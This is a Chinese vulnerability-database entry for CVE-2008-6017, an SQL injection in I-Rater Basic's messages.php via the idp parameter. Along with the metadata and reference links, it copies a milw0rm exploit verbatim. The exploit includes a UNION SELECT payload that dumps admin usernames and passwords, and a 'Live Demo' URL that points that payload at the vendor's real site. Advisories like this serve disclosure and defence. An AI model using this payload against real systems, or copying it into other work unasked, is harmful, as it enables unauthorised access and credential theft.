I-RATER Basic 'messages.php' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117083 漏洞类型 SQL注入
发布时间 2008-12-18 更新时间 2009-02-03
CVE编号 CVE-2008-6017 CNNVD-ID CNNVD-200902-692
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7514
https://cxsecurity.com/issue/WLB-2009020087
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-692
|漏洞详情
I-RaterBasic中的messages.php存在SQL注入漏洞。远程攻击者可以借助idp参数,执行任意的SQL指令。
|漏洞EXP
#######################################################
I-Rater Basic(messages.php) SQL-injection.
#######################################################

###################################################
#[~] Author :  boom3rang 
#[~] Kosova Hackers Group [www.khg-crew.ws]
#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.


#[!] Script Name: I-Rater Basic
#[!] Home Page:  http://www.i-rater.com
#[!] Google_Dork:  N/A
###################################################





#[~] Example:  
http://localhost/Path/messages.php?idp=[exploit]

#[~]Exploit:  
-9999+union+all+select+1,2,3,concat(username,char(58),password)KHG,5,6,7,8+from+admin--


#[!] Live Demo
http://www.i-rater.com/basic/messages.php?idp=-9999+union+all+select+1,2,3,concat(username,char(58),password)KHG,5,6,7,8+from+admin--


#[!] Note
To see the information go View Sources/Search "large.php?id=" ;).

##############################
#[!] Proud 2 be Albanian
#[!] Proud 2 be Muslim
#[!] United States of Albania
##############################

# milw0rm.com [2008-12-18]
|参考资料

来源:BID
名称:32912
链接:http://www.securityfocus.com/bid/32912
来源:MILW0RM
名称:7514
链接:http://www.milw0rm.com/exploits/7514
来源:SECUNIA
名称:33213
链接:http://secunia.com/advisories/33213